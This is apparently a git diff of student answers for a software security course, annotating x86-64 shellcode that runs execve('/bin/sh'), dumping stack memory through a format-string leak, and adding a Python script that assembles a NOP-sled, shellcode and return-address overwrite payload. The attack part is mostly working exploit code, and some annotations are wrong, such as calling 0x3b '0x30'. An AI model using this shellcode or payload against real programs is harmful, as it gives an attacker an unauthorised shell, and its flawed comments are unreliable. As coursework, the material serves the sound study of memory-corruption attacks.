ass5bex1 done

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
new file mode 100644 (file)
index 0000000..22d5af2
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
@@ -0,0 +1,40 @@
+a, b).
+\x48\x31\xd2                                   xor %rdx, %rdx
+Put in %rdx the value of %rdx xor'ed with %rdx. This basically means 0.
+
+\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68       mov $0x68732f6e69622f2f, %rbx
+Put "/bin/sh" in the %rbx register.
+
+\x48\xc1\xeb\x08                               shr $0x8, %rbx
+Bitshift the %rbx register 8 places to the right
+
+\x53                                           push %rbx
+Put the %rbx register on the stack
+
+\x48\x89\xe7                                   mov %rsp, %rdi
+Put the top item on the stack(%rbx, "/bin/sh") in %rdi
+
+\x52                                           push %rdx
+Push %rdx on the stack(which was 0)
+
+\x57                                           push %rdi
+Push %rdi on the stack(which was %rbx, which was "/bin/sh")
+
+\x48\x89\xe6                                   mov %rsp, %rsi
+Put the top item from the stack in %rsi("/bin/sh")
+
+\xb0\x3b                                       mov $0x3b, %al
+Put 0x30 in %al which is the short %rax, return value.
+
+\x0f\x05                                       syscall
+This does a sys_execve call. in the following format
+       sys_execve(%rdi, %rsi %rdx)
+       sys_execve(file, argv, envp)
+       sys_execve("/bin/sh", "/bin/sh", NULL);
+
+c)
+The shellcode will start up a shell.
+
+d)
+The string containing the shell code is not padded with zeros. Zero bytes
+must not occur in shell code.

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
index a07cb46..95b7f60 100644 (file)
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
@@ -3,11 +3,10 @@ be garbled.
 
 b.     "%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx"
 The memory outputted is this:  
-7ffff7ff80d0
+7ffff7ff805b
 7ffff7dd8de0
 fbad2088
 786c2520786c2520
-786c2520786c2520
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
@@ -20,14 +19,15 @@ fbad2088
 20786c2520786c25
 20786c2520786c25
 20786c2520786c25
-786c2520786c25
-7fffffffeb40
-7fffffffebd0
+786c25
+1
+7fffffffeb30
+7fffffffebc0
 4006a9
 0
 100400530
-7fffffffebe0
-4006c2
-0
 
-c.     
+c.     Frame pointer: 7fffffffeb30 or 7fffffffebc0
+       return address: 4006a9
+
+d.     17 words of 8 bytes therefore 136

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py
new file mode 100644 (file)
index 0000000..c913d1b
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/t.py
@@ -0,0 +1,6 @@
+shellcode = '\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb'\
+    '\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05'
+nop = '\x0f\x1f'
+
+string = nop*50 + shellcode + "\x0f\x1f\x7f\xff\xff\xff\xeb\x3e"
+print(string)